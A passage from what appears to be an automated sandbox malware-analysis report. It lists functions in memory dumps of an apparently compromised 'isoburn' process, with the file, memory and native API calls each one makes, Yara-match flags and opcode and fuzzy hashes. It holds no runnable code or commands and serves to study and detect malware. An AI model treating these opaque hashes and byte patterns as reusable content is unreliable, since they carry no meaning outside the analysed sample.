                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02EDC364
                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02EDC39F
                                                                          • FindClose.KERNELBASE(00000000), ref: 02EDC3AA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: e5a8113a24b97868ad254099b4ce76d3a16e60903e4235b5ab03e4c1fc8c4a56
                                                                          • Instruction ID: fcfb052667272b99468d70fbb43011605e7db559d2bf389199b6a81b8f14c37a
                                                                          • Opcode Fuzzy Hash: e5a8113a24b97868ad254099b4ce76d3a16e60903e4235b5ab03e4c1fc8c4a56
                                                                          • Instruction Fuzzy Hash: AF31A3719402087BDB20DBA0CC85FFF777CAF44749F24959DF509A7180EA70AA85CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED1A10 Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID: ,
                                                                          • API String ID: 2340568224-3772416878
                                                                          • Opcode ID: dd548d637da250e67812eecc5728c5fa8a883e6c5483b14cbb7e266c0dea2505
                                                                          • Instruction ID: eb4781532d3216d1b5bc52d843617f553e637bcf1243402ba58bf48b20818796
                                                                          • Opcode Fuzzy Hash: dd548d637da250e67812eecc5728c5fa8a883e6c5483b14cbb7e266c0dea2505
                                                                          • Instruction Fuzzy Hash: F0E19FB1D40218ABDF24DFA4DC41FEEB7BAAF44308F04D559E50AA6141EB70A746CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE4F10 Relevance: 1.6, APIs: 1, Instructions: 87filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02EE4FD1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                          • Instruction ID: 86ab9a2c0a3e41964946f082d8e0c32aa22e7abbe4de57447bc4a287c68f0d0d
                                                                          • Opcode Fuzzy Hash: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                          • Instruction Fuzzy Hash: 2D21B0B2210509BFDB44DE99DC80EEB73AEAF8C714F10960CFA1D97241D630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE5040 Relevance: 1.6, APIs: 1, Instructions: 79filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02EE50F1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                          • Instruction ID: 65c6f8816d152747fbbdb66c21d5e701fdcc7fff6f758d3e79e2c13d5b327e6c
                                                                          • Opcode Fuzzy Hash: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                          • Instruction Fuzzy Hash: 5C21C4B2200509AFDB14DE98DC80EEB73EDAF8C754F10860CFA1D97241D630E9118BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE52C0 Relevance: 1.6, APIs: 1, Instructions: 67memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(02ED1A88,?,02ED21A9,00000000,00000004,00003000,00000004,00000000,02ED21A9,?,02ED1A88,02ED21A9,?), ref: 02EE5356
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: 3eabdd7af9bcf2049aa790797242d275fce47b0460ceb6be2fb30c3a51327ec2
                                                                          • Instruction ID: 4e41265ce378f079a8c45d1fe091ed446db9e9f20397919c3381416d8410f939
                                                                          • Opcode Fuzzy Hash: 3eabdd7af9bcf2049aa790797242d275fce47b0460ceb6be2fb30c3a51327ec2
                                                                          • Instruction Fuzzy Hash: 591143B2200609AFDB10DE98DC80EAB73ADEF88314F10850CFA1997241D770B9128BB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE5100 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: a676d15123d1633ce15ea626317f44c1822bff9036793ed6d774349b85bba25c
                                                                          • Instruction ID: 90d50d321e2e5ce51ff8151f114de0c548d7d87e44c166d5bf0702ecbc79184c
                                                                          • Opcode Fuzzy Hash: a676d15123d1633ce15ea626317f44c1822bff9036793ed6d774349b85bba25c
                                                                          • Instruction Fuzzy Hash: 0201D172240A007FD620AAA9CC40FABB3AEEFC5325F10851DFA1D97242D730B9018BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE5180 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EE51B7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                          • Instruction ID: ec9b3acc3fee883af51aa4a97079a19d228a3c80ff138b1b332bc17ea90f3ff6
                                                                          • Opcode Fuzzy Hash: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                          • Instruction Fuzzy Hash: E5E086316506147FD520EA59CC00F97B7ADEFC6711F40C419FA0CAB242C670B9158BF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05444650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9d50aa84d5acba81e3e52c0b23a781f87f5fdb77f952fd2ffb78a61275cecf46
                                                                          • Instruction ID: 4111e5e2dbe54ebb9fde46266148721f342d39a831ce2fa242d42f0dd9e67bac
                                                                          • Opcode Fuzzy Hash: 9d50aa84d5acba81e3e52c0b23a781f87f5fdb77f952fd2ffb78a61275cecf46
                                                                          • Instruction Fuzzy Hash: 4C90026260150042414071584844446601597F13113E5C116B4554560D8B188D559669
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05444340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: fe556c4d964f19a5bbe2ccb5a40dc3ec9b317023fe37fcfc6553ca04cf75c178
                                                                          • Instruction ID: 0d9602d2ec5f12bff5cd4f1c281adf7816425a2dfa4480fd3a8b964779c5ab36
                                                                          • Opcode Fuzzy Hash: fe556c4d964f19a5bbe2ccb5a40dc3ec9b317023fe37fcfc6553ca04cf75c178
                                                                          • Instruction Fuzzy Hash: 78900232605800129140715848C4586401597F0311BA5C012F4424554D8F148E565761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3a929044a88ea91a64a305bf5b7f1d7a046bd25bbc99227de67a31acc1dec2aa
                                                                          • Instruction ID: 7e3224d172854ae3f73f225b43b3fc5b7ccf8105c5cab784b471adbc253f3efd
                                                                          • Opcode Fuzzy Hash: 3a929044a88ea91a64a305bf5b7f1d7a046bd25bbc99227de67a31acc1dec2aa
                                                                          • Instruction Fuzzy Hash: 0090022A21340002D1807158544864A001587E1212FE5D416B4015558DCE158D695721
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 34e8fa723e02c1c5286d5d02891ee88b4c16b77521f9dfb9c13a1087158be724
                                                                          • Instruction ID: 1fa0e3a73d66add9d22713ec64a0c1ad4a66dd2da3a90484d60bc1f0a317ef52
                                                                          • Opcode Fuzzy Hash: 34e8fa723e02c1c5286d5d02891ee88b4c16b77521f9dfb9c13a1087158be724
                                                                          • Instruction Fuzzy Hash: 5890022230140003D140715854586464015D7F1311FA5D012F4414554DDE158D565622
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3bdb5b79e399ef75d06567c0a579438827ba168f6f082a7d416cd7e07bf0f124
                                                                          • Instruction ID: 1ae0ff15749cb0cf69d2571a9ef91ca6d4502041e0c6a9c04dc6aecd821f003c
                                                                          • Opcode Fuzzy Hash: 3bdb5b79e399ef75d06567c0a579438827ba168f6f082a7d416cd7e07bf0f124
                                                                          • Instruction Fuzzy Hash: 35900222242441525545B1584444547401697F02517E5C013B5414950D8A269D56DA21
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 129138d08712090899a18342479041e21befa45202dee175d2c2545541fb3f3a
                                                                          • Instruction ID: 8a686123e15116a9144cc5704ceb374ad275bab51f096260945056c706b12391
                                                                          • Opcode Fuzzy Hash: 129138d08712090899a18342479041e21befa45202dee175d2c2545541fb3f3a
                                                                          • Instruction Fuzzy Hash: C890023220140413D11171584544747001987E0251FE5C413B4424558E9B568E52A521
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 046b85ca187ffbfe6837cd155b287b44fe22c92eeffa13a836dc64522a6543bc
                                                                          • Instruction ID: ff10b0a5446466f5fb90352ef65c4649aa4bcb4cf3cad355e5c84e7fcc2cb84c
                                                                          • Opcode Fuzzy Hash: 046b85ca187ffbfe6837cd155b287b44fe22c92eeffa13a836dc64522a6543bc
                                                                          • Instruction Fuzzy Hash: 2890023220140842D10071584444B86001587F0311FA5C017B4124654E8B15CD517921
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: cb485de1793df2bf3364faa18d8eda3a3ebb464d07f85a2741ad62ea2484a6f0
                                                                          • Instruction ID: d46e9cdd653b3a10268681b9518c1ec144d870528b4f0413a99a5c0fee7ff0d2
                                                                          • Opcode Fuzzy Hash: cb485de1793df2bf3364faa18d8eda3a3ebb464d07f85a2741ad62ea2484a6f0
                                                                          • Instruction Fuzzy Hash: 3F90023220148802D1107158844478A001587E0311FA9C412B8424658E8B958D917521
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 833c1a9c1f499fe6e461e99f26c8bae3be458ad304ec0e91dd431e682ca42899
                                                                          • Instruction ID: 4114a60a45466fa679bad13469f1bff6e68b942cb439f23b7070d881c780d6ee
                                                                          • Opcode Fuzzy Hash: 833c1a9c1f499fe6e461e99f26c8bae3be458ad304ec0e91dd431e682ca42899
                                                                          • Instruction Fuzzy Hash: A690023220140402D10075985448686001587F0311FA5D012B9024555FCB658D916531
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 53a3178378bddfe8fdbc54dc91144161e6064f4d40716063d0fd884db2650b24
                                                                          • Instruction ID: bae0e0127c2a8f3e4fcf0e93a749cbd5b6a7ca97387b733f67c7e8f3e8c49e84
                                                                          • Opcode Fuzzy Hash: 53a3178378bddfe8fdbc54dc91144161e6064f4d40716063d0fd884db2650b24
                                                                          • Instruction Fuzzy Hash: EF90026234140442D10071584454B460015C7F1311FA5C016F5064554E8B19CD526526
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4b44c80ace3a5e639855dec4c9620fbd952c53146f71ce116af358a3037a389e
                                                                          • Instruction ID: ad1c899f3fdf5bf937d8bde3aa1351b9a6fd2a7e9eb9d8b058db069b4ed211c0
                                                                          • Opcode Fuzzy Hash: 4b44c80ace3a5e639855dec4c9620fbd952c53146f71ce116af358a3037a389e
                                                                          • Instruction Fuzzy Hash: 65900222211C0042D20075684C54B47001587E0313FA5C116B4154554DCE158D615921
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1b540ceb1894549855ed5a88feb65e615e7cd667191b7b95bb5ea39539673dcf
                                                                          • Instruction ID: 9b54206aaa422cb807ae6138cdee9d2e92a82f801ccbfd21e7341e893150e2c8
                                                                          • Opcode Fuzzy Hash: 1b540ceb1894549855ed5a88feb65e615e7cd667191b7b95bb5ea39539673dcf
                                                                          • Instruction Fuzzy Hash: 1D900222601400424140716888849464015ABF12217A5C122B4998550E8A598D655A65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ab3a347070e39cd17b036647c58e52a698c7166655cd5040eb2e02c1df6bef27
                                                                          • Instruction ID: a3978f74e176954045cc26bf46284468fee4be828619b7f2949f16b7b9ca04c1
                                                                          • Opcode Fuzzy Hash: ab3a347070e39cd17b036647c58e52a698c7166655cd5040eb2e02c1df6bef27
                                                                          • Instruction Fuzzy Hash: C090026220180403D14075584844647001587E0312FA5C012B6064555F8F298D516535
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 70d275eeb32768c9381e58fae67c1e7cd0a972a63c1d8eb01db324e4f2c9cb52
                                                                          • Instruction ID: 27bb27b96f50822c0cf9df9019bc493dc11e04e2bfe6d3d9fea4115d64cc6dc1
                                                                          • Opcode Fuzzy Hash: 70d275eeb32768c9381e58fae67c1e7cd0a972a63c1d8eb01db324e4f2c9cb52
                                                                          • Instruction Fuzzy Hash: 1890022260140502D10171584444656001A87E0251FE5C023B5024555FCF258E92A531
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 87dbb22019714da400ede34c6d2d372fd30239b71c6d8f2c88e5779a55568368
                                                                          • Instruction ID: 5b195ac090c5829f5ae06cd6c35fe1f83d631ee7283341974b57bf79366acb75
                                                                          • Opcode Fuzzy Hash: 87dbb22019714da400ede34c6d2d372fd30239b71c6d8f2c88e5779a55568368
                                                                          • Instruction Fuzzy Hash: 2D90026220240003410571584454656401A87F0211BA5C022F5014590ECA258D916525
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
